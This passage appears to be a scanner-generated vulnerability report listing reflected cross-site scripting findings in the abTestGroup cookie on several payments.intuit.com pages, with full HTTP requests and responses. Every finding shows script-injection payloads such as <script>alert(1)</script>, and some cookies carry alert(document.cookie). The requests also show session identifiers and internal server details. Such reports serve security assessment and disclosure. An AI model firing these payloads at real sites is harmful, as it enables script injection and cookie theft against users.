Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16ccada<script>alert(1)</script>03b0d3d035e;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:55 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=53Fsh9ZkrUDHbp7oUMHGEQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:56 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9605F990A0805192AA117E3E93D0972
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=point_002dof_002dsale_002dsolutions_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 150350

...[SNIP]...
<br />
       A/B Test Group: T16ccada<script>alert(1)</script>03b0d3d035e<br />
...[SNIP]...

1.113. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cec2"><script>alert(1)</script>271f29d1570 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T162cec2"><script>alert(1)</script>271f29d1570;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:45 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=8uIscsyAcAxK6UG5XBL70g**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:46 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D7A010A0805192AA117E37D24A810
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=process_002dcard_002dpayments_002dfor_002dmac_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 121588

...[SNIP]...
<input id="testGroup" value="T162cec2"><script>alert(1)</script>271f29d1570" type="hidden" />
...[SNIP]...

1.114. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 3073f<script>alert(1)</script>daf5c68037 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T163073f<script>alert(1)</script>daf5c68037;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:23 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=vrChgoohWVM8zjK8gWTXgQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:24 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95EFA180A0805192AA117E32813E0CE
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=process_002dcard_002dpayments_002dfor_002dmac_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 121570

...[SNIP]...
<br />
       A/B Test Group: T163073f<script>alert(1)</script>daf5c68037<br />
...[SNIP]...

1.115. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload a853f<script>alert(1)</script>6d2e750d194 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16a853f<script>alert(1)</script>6d2e750d194;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:59 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=dkvxEMxSJoNDWw3yYMG1Ug**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:00 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E9B810A0805192AA117E3BA39685A
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002donline_002dbilling_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 127098

...[SNIP]...
<br />
       A/B Test Group: T16a853f<script>alert(1)</script>6d2e750d194<br />
...[SNIP]...

1.116. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bda72"><script>alert(1)</script>0bd96e557df was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16bda72"><script>alert(1)</script>0bd96e557df;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:18 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=glcdfXA9NtOUrBVpxZTdFA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:19 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D10D60A0805192AA117E3998AC0B7
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002donline_002dbilling_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 127114

...[SNIP]...
<input id="testGroup" value="T16bda72"><script>alert(1)</script>0bd96e557df" type="hidden" />
...[SNIP]...

1.117. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/web-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 49004<script>alert(1)</script>a5a17e50b33 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1649004<script>alert(1)</script>a5a17e50b33;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:34 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=60SdIUifGBPKGJj3gZgUzg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:35 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9600E320A0805192AA117E3CB159DAA
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116390

...[SNIP]...
<br />
       A/B Test Group: T1649004<script>alert(1)</script>a5a17e50b33<br />
...[SNIP]...

1.118. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/web-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2219"><script>alert(1)</script>d85e888e13e was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d2219"><script>alert(1)</script>d85e888e13e;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:21 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=T1u1XH4DfrzerP928diaQw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:22 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E07850A0805192AA117E3B164A0FB
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116404

...[SNIP]...
<input id="testGroup" value="T16d2219"><script>alert(1)</script>d85e888e13e" type="hidden" />
...[SNIP]...

1.119. http://payments.intuit.com/support/ [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /support/

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c79ad"><script>alert(1)</script>e8785a94aac was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /support/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; 